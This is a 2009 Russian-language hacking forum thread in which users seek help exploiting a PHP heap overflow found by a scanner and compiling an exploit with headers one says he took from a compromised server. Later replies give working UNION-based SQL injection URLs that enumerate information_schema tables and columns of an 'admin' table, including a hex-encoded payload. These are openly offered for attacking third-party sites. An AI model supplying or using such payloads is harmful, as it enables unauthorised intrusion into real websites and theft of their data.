30.10.2009, 18:05
|
|
Познающий
Регистрация: 09.11.2008
Сообщений: 34
С нами:
9212732
Репутация:
2
|
|
Парни сканером нашел уязвимость:
php html entity encoder heap overflow vulnerability, но нигде не могу найти инфу как ее юзать, кроме этого: http://www.securitylab.ru/vulnerability/276352.php. Но этого не достаточно, может кто нибудь помочь, поконкретней описать багу?
|
|
|
30.10.2009, 19:06
|
|
Познавший АНТИЧАТ
Регистрация: 27.04.2007
Сообщений: 1,044
С нами:
10021597
Репутация:
905
|
|
p.r0phe.t, что показывают команды
Код:
$ find / -name stdio.h
и/или
Возможно, они есть, но лежат по нестандартному пути. Если же не найдутся, придется компилить на другой тачке. А тянуть все хэдеры - это гемор |
|
|
|
31.10.2009, 07:41
|
|
Познающий
Регистрация: 22.08.2009
Сообщений: 98
С нами:
8799871
Репутация:
19
|
|
Сообщение от krypt3r
p.r0phe.t, что показывают команды
Код:
$ find / -name stdio.h
и/или
Возможно, они есть, но лежат по нестандартному пути. Если же не найдутся, придется компилить на другой тачке. А тянуть все хэдеры - это гемор sh-3.1$ locate stdio.h
/usr/lib/gcc/i486-linux-gnu/4.1.2/include/ssp/stdio.h
/usr/lib/perl/5.8.8/CORE/nostdio.h
Компилирую на своём OpenSUSe не нашёл всего 1 библиотеку: asm/page.h. Вопрос: где скачать эту либу и куда ему закопировать?
P.S. Всё,разобрался. либу с поломанного серва слил,кому мож понадобится,либы хранятся в usr/include/
Последний раз редактировалось p.r0phe.t; 31.10.2009 в 08:32..
|
|
|
|
31.10.2009, 10:56
|
|
Познающий
Регистрация: 22.08.2009
Сообщений: 98
С нами:
8799871
Репутация:
19
|
|
Сообщение от krypt3r
p.r0phe.t, что показывают команды
Код:
$ find / -name stdio.h
и/или
Возможно, они есть, но лежат по нестандартному пути. Если же не найдутся, придется компилить на другой тачке. А тянуть все хэдеры - это гемор Все либы есть на хосте. Какой синтаксис для прописывания путей к ним? В си не шарю =(
|
|
|
|
31.10.2009, 09:31
|
|
Участник форума
Регистрация: 24.08.2009
Сообщений: 172
С нами:
8797559
Репутация:
-16
|
|
est takoy vapros..(izvinite 4to po ruskom ne napisu)
naprimer na sayte est injection (mysql ili sql) i ya nasel table name
http://www.xxx.com/news.php?iid=1+union+select+0,1,2,3,4+from+admin
a potom ya xo4u nayti columns name nu tut ne daet kakom 4isle columns name naprimer 2,3 a kak mojno ix uznat??
order+by ili kak??
|
|
|
|
31.10.2009, 09:34
|
|
Познающий
Регистрация: 22.08.2009
Сообщений: 98
С нами:
8799871
Репутация:
19
|
|
Сообщение от LokbatanLi
est takoy vapros..(izvinite 4to po ruskom ne napisu)
naprimer na sayte est injection (mysql ili sql) i ya nasel table name
http://www.xxx.com/news.php?iid=1+union+select+0,1,2,3,4+from+admin
a potom ya xo4u nayti columns name nu tut ne daet kakom 4isle columns name naprimer 2,3 a kak mojno ix uznat??
order+by ili kak??
RTFM!
Статей по скулям - тьма!
|
|
|
|
31.10.2009, 09:38
|
|
Участник форума
Регистрация: 24.08.2009
Сообщений: 172
С нами:
8797559
Репутация:
-16
|
|
ne ponel
|
|
|
|
31.10.2009, 10:11
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
С нами:
10585560
Репутация:
1550
|
|
LokbatanLi
http://www.xxx.com/news.php?iid=1+union+select+table_name,1,2,3,4+fro m+information_schema.tables+limit+17,1
только в случае если весия ДБ 5, и если у тебя вывод под цифрой 0
дальше после того как узнал имя нужной табелки
http://www.xxx.com/news.php?iid=1+union+select+column_name,1,2,3,4+fr om+information_schema.columns+where+table_name='ad min'+limit+0,1
имя табелки лучше перевести в SQL HEX
а еще лучше я думаю вот такой вот запрос сделать
http://www.xxx.com/news.php?iid=1+UNION+SELECT+AES_DECRYPT(AES_ENCRYP T(CONCAT(0xd187d0b8d182d0b0d0b920d181d182d0b0d182d 0b5d0b9d0bad0b820d0bfd180d0be20d181d0bad183d0bbd0b 8,(SELECT+CONCAT(TABLE_NAME,0x3a,TABLE_SCHEMA)+FRO M+INFORMATION_SCHEMA.TABLES+LIMIT+16,1),0x 0xd182d0b8d0bfd0be20687474703a2f2f666f72756d2e616e 7469636861742e72752f7468726561643130343539312e6874 6d6c),0x71),0x71)
|
|
|
|
31.10.2009, 12:20
|
|
Участник форума
Регистрация: 24.08.2009
Сообщений: 172
С нами:
8797559
Репутация:
-16
|
|
Сообщение от Gorev
LokbatanLi
http://www.xxx.com/news.php?iid=1+union+select+table_name,1,2,3,4+fro m+information_schema.tables+limit+17,1
только в случае если весия ДБ 5, и если у тебя вывод под цифрой 0
дальше после того как узнал имя нужной табелки
http://www.xxx.com/news.php?iid=1+union+select+column_name,1,2,3,4+fr om+information_schema.columns+where+table_name='ad min'+limit+0,1
имя табелки лучше перевести в SQL HEX
а еще лучше я думаю вот такой вот запрос сделать
http://www.xxx.com/news.php?iid=1+UNION+SELECT+AES_DECRYPT(AES_ENCRYP T(CONCAT(0xd187d0b8d182d0b0d0b920d181d182d0b0d182d 0b5d0b9d0bad0b820d0bfd180d0be20d181d0bad183d0bbd0b 8,(SELECT+CONCAT(TABLE_NAME,0x3a,TABLE_SCHEMA)+FRO M+INFORMATION_SCHEMA.TABLES+LIMIT+16,1),0x 0xd182d0b8d0bfd0be20687474703a2f2f666f72756d2e616e 7469636861742e72752f7468726561643130343539312e6874 6d6c),0x71),0x71)
vi ne poneli menya
|
|
|
|
31.10.2009, 12:29
|
|
Познающий
Регистрация: 09.04.2008
Сообщений: 79
С нами:
9520453
Репутация:
124
|
|
Сообщение от LokbatanLi
vi ne poneli menya
Для начала, воспользуйся сервисом http://www.translit.ru , дабы тебя можно было лучше понять. После этого или перефразируй свой вопрос, или же прочти вот эту статью . Мне кажется, после прочтения (возможно, первого) многие вопросы отпадут сами собой. Удачи! =)
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
